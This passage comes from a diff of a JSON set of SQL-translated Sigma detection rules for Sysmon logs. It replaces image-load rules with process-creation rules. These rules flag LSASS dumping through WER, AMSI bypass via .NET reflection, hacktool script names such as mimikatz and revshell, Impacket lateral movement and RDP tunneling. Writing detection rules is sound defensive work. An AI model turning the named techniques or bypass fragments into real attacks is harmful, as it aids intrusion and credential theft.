'\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": 
"9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR 
CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + 
"attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded 
LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE 
'\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + 